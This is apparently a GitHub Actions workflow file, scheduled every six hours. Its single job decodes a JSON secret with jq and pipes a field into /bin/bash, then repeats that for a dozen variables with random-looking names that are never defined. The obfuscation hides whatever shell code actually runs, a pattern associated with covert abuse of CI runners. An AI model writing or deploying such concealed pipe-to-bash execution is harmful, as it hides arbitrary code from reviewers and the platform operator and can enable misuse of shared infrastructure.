name: lilangzx

on:
  workflow_dispatch:
  schedule:
    - cron: '43 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lilangzx
        env:
          sb0784: ${{ secrets.sb0784 }}
        run: |
          echo $sb0784 | jq -r .ezk7468 | /bin/bash
          echo $m0 | jq -r .k836 | /bin/bash
          echo $i3 | jq -r .y75962 | /bin/bash
          echo $vm501 | jq -r .gvugz89104 | /bin/bash
          echo $ksv585 | jq -r .d52180 | /bin/bash
          echo $sd98 | jq -r .b6848 | /bin/bash
          echo $hb47125 | jq -r .ry1 | /bin/bash
          echo $ruc30 | jq -r .w00 | /bin/bash
          echo $rwy8234 | jq -r .ht206 | /bin/bash
          echo $dga449 | jq -r .qtgpi8 | /bin/bash
          echo $yah6718 | jq -r .empuw5565 | /bin/bash
          echo $ho2154 | jq -r .wnqwn8 | /bin/bash
          echo $si67932 | jq -r .s687 | /bin/bash

